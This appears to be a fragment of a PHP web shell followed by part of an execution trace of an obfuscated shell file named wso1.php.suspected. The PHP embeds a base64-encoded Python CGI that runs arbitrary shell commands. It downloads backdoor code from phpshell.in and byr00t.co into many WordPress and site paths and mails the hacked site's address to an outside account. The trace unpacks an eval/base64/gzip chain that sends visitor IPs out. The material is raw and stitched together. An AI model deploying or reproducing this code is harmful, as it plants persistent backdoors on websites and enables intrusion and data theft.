'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';\r\n \$file = fopen(\"python.r00t\" ,\"w+\");\r\n \$write = fwrite (\$file ,base64_decode(\$pythonp));\r\n fclose(\$file);\r\n chmod(\"python.r00t\",0755);\r\n echo \"<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> \";\r\n printFooter();\r\n } if( empty(\$_POST['a']) ) if(isset(\$default_action) && function_exists('action' . \$default_action)) \$_POST['a'] = \$default_action;\r\n else \$_POST['a'] = 'SecInfo';\r\n if( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) ) call_user_func('action' . \$_POST['a']);\r\n \r\n?>\r\n<?php if(\$_POST['query']){ \$veriyfy = stripslashes(stripslashes(\$_POST['query']));\r\n \$data = \"data.txt\";\r\n @touch (\"data.txt\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$veriyfy ) ;\r\n @fclose (\$ver);\r\n }else{ \$datas=@fopen(\"data.txt\",'r');\r\n \$i=0;\r\n while (\$i <= 5) { \$i++;\r\n \$blue=@fgets(\$datas,1024);\r\n echo \$blue;\r\n } } \$datasi=@fopen(\"js/js.php\",'r');\r\n if(\$datasi){ }else{ @mkdir(\"js\");\r\n \$dos = file_get_contents(\"http://phpshell.in/txt/lamer.txt\");\r\n \$data = \"js/js.php\";\r\n @touch (\"js/js.php\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$dos ) ;\r\n @fclose (\$ver);\r\n \$yol = \"http://\".\$_SERVER['HTTP_HOST'].\"\".\$_SERVER['REQUEST_URI'].\"\";\r\n \$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.\$yol.'<br/>Sender Yolu : js/js.php</h1>';\r\n \$header .= \"From: SheLL Boot <suppor@nic.org>\\n\";\r\n \$header .= \"Content-Type: text/html;\r\n charset=utf-8\\n\";\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get(\$url){\r\n\$im = curl_init(\$url);\r\ncurl_setopt(\$im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt(\$im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt(\$im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt(\$im, CURLOPT_HEADER, 0);\r\nreturn curl_exec(\$im);\r\ncurl_close(\$im);\r\n}\r\n\$check1 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-includes/js/js.php\" ;\r\n\$text1 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1 = fopen(\$check1, 'w');\r\nfwrite(\$open1, \$text1);\r\nfclose(\$open1);\r\nif(file_exists(\$check1)){\r\n}\r\n\$check12 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-includes/index.php\" ;\r\n\$text12 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12 = fopen(\$check12, 'w');\r\nfwrite(\$open12, \$text12);\r\nfclose(\$open12);\r\nif(file_exists(\$check12)){\r\n}\r\n\$check123 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/images/images.php\" ;\r\n\$text123 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123 = fopen(\$check123, 'w');\r\nfwrite(\$open123, \$text123);\r\nfclose(\$open123);\r\nif(file_exists(\$check123)){\r\n}\r\n\$check12345 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css/css.php\" ;\r\n\$text12345 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345 = fopen(\$check12345, 'w');\r\nfwrite(\$open12345, \$text12345);\r\nfclose(\$open12345);\r\nif(file_exists(\$check12345)){\r\n}\r\n\$check123456 = \$_SERVER['DOCUMENT_ROOT'] . \"/adm.php\" ;\r\n\$text123456 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456 = fopen(\$check123456, 'w');\r\nfwrite(\$open123456, \$text123456);\r\nfclose(\$open123456);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/css.php\" ;\r\n\$text1234567 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567 = fopen(\$check1234567, 'w');\r\nfwrite(\$open1234567, \$text1234567);\r\nfclose(\$open1234567);\r\nif(file_exists(\$check1234567)){\r\n}\r\n\$check12345678 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-admin/install.php\" ;\r\n\$text12345678 = http_get('http://byr00t.co/txt/tools.txt');\r\n\$open12345678 = fopen(\$check12345678, 'w');\r\nfwrite(\$open12345678, \$text12345678);\r\nfclose(\$open12345678);\r\nif(file_exists(\$check12345678)){\r\n}\r\n\$check123456789 = \$_SERVER['DOCUMENT_ROOT'] . \"/cgi-bin/css.php\" ;\r\n\$text123456789 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789 = fopen(\$check123456789, 'w');\r\nfwrite(\$open123456789, \$text123456789);\r\nfclose(\$open123456789);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check12345678910 = \$_SERVER['DOCUMENT_ROOT'] . \"/js/css.php\" ;\r\n\$text12345678910 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910 = fopen(\$check12345678910, 'w');\r\nfwrite(\$open12345678910, \$text12345678910);\r\nfclose(\$open12345678910);\r\nif(file_exists(\$check123456)){\r\n}\r\n\$check1234567891011 = \$_SERVER['DOCUMENT_ROOT'] . \"/css/css.php\" ;\r\n\$text1234567891011 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011 = fopen(\$check1234567891011, 'w');\r\nfwrite(\$open123, \$text1234567891011);\r\nfclose(\$open1234567891011);\r\nif(file_exists(\$check1234567891011)){\r\n}\r\n\$check123456789101112 = \$_SERVER['DOCUMENT_ROOT'] . \"/wp-login.php\" ;\r\n\$text123456789101112 = http_get('http://phpshell.in/txt/seo.txt');\r\n\$open123456789101112= fopen(\$check123456789101112, 'w');\r\nfwrite(\$open123456789101112, \$text123456789101112);\r\nfclose(\$open123456789101112);\r\nif(file_exists(\$check123456789101112)){\r\n}\r\n\$check12345678910111213 = \$_SERVER['DOCUMENT_ROOT'] . \"/images/css.php\" ;\r\n\$textk12345678910111213 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk12345678910111213 = fopen(\$checkk12345678910111213, 'w');\r\nfwrite(\$openk12345678910111213, \$textk12345678910111213);\r\nfclose(\$openk12345678910111213);\r\nif(file_exists(\$checkk12345678910111213)){\r\n}\r\n\$check1234567891011121314 = \$_SERVER['DOCUMENT_ROOT'] . \"/img/css.php\" ;\r\n\$text1234567891011121314 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314 = fopen(\$checkk1234567891011121314, 'w');\r\nfwrite(\$open1234567891011121314, \$text1234567891011121314);\r\nfclose(\$open1234567891011121314);\r\nif(file_exists(\$check1234567891011121314)){\r\n}\r\n\$check123456789101112131415 = \$_SERVER['DOCUMENT_ROOT'] . \"/modules/css.php\" ;\r\n\$text123456789101112131415 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open123456789101112131415 = fopen(\$check123456789101112131415, 'w');\r\nfwrite(\$open123456789101112131415, \$text123456789101112131415);\r\nfclose(\$open123456789101112131415);\r\nif(file_exists(\$check123456789101112131415)){\r\n}\r\n\$check12345678910111213141516 = \$_SERVER['DOCUMENT_ROOT'] . \"/includes/css.php\" ;\r\n\$text12345678910111213141516 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516 = fopen(\$check12345678910111213141516, 'w');\r\nfwrite(\$open12345678910111213141516, \$text12345678910111213141516);\r\nfclose(\$open12345678910111213141516);\r\nif(file_exists(\$check12345678910111213141516)){\r\n}\r\n\$check1234567891011121314151617 = \$_SERVER['DOCUMENT_ROOT'] . \"/phpinfo.php\" ;\r\n\$text1234567891011121314151617 = http_get('http://phpshell.in/txt/phpinfo.txt');\r\n\$open1234567891011121314151617 = fopen(\$check1234567891011121314151617, 'w');\r\nfwrite(\$open1234567891011121314151617, \$text1234567891011121314151617);\r\nfclose(\$open1234567891011121314151617);\r\nif(file_exists(\$check1234567891011121314151617)){\r\n}\r\n\$check123456789101112131415161718 = \$_SERVER['DOCUMENT_ROOT'] . \"/.well-known/css.php\" ;\r\n\$textk123456789101112131415161718 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$openk123456789101112131415161718 = fopen(\$checkk123456789101112131415161718, 'w');\r\nfwrite(\$openk123456789101112131415161718, \$textk123456789101112131415161718);\r\nfclose(\$openk123456789101112131415161718);\r\nif(file_exists(\$checkk123456789101112131415161718)){\r\n}\r\n\$checkk12345678910111213141516171819 = \$_SERVER['DOCUMENT_ROOT'] . \"/sites/css.php\" ;\r\n\$text12345678910111213141516171819 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open12345678910111213141516171819 = fopen(\$check12345678910111213141516171819, 'w');\r\nfwrite(\$open12345678910111213141516171819, \$text12345678910111213141516171819);\r\nfclose(\$open12345678910111213141516171819);\r\nif(file_exists(\$check12345678910111213141516171819)){\r\n}\r\n\$check1234567891011121314151617181920 = \$_SERVER['DOCUMENT_ROOT'] . \"/tmp/css.php\" ;\r\n\$text1234567891011121314151617181920 = http_get('http://phpshell.in/txt/lamer.txt');\r\n\$open1234567891011121314151617181920 = fopen(\$check1234567891011121314151617181920, 'w');\r\nfwrite(\$open1234567891011121314151617181920, \$text1234567891011121314151617181920);\r\nfclose(\$open1234567891011121314151617181920);\r\nif(file_exists(\$check1234567891011121314151617181920)){\r\n}\r\n?>\r\n");

Execution traces

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676239751.5135.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:09:37.411291]
1	0	1	0.000141	393608
1	3	0	0.000369	427040	{main}	1		/var/www/html/uploads/wso1.php.suspected	0	0
1		A						/var/www/html/uploads/wso1.php.suspected	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/wso1.php.suspected	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000451	427040	base64_decode	0		/var/www/html/uploads/wso1.php.suspected	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000470	427200
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000491	427168	gzinflate	0		/var/www/html/uploads/wso1.php.suspected	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000513	427296
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000531	427136	htmlspecialchars_decode	0		/var/www/html/uploads/wso1.php.suspected	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000550	427168
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000609	428712	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/wso1.php.suspected	4	0
3	8	0	0.000629	428712	strrev	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000681	461512
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000727	461480	base64_decode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000843	494280
3	9	R			'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	0	0.001290	461480	gzinflate	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001752	486088
3	10	R			'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	0	0.002199	453288	gzuncompress	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002948	539336
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
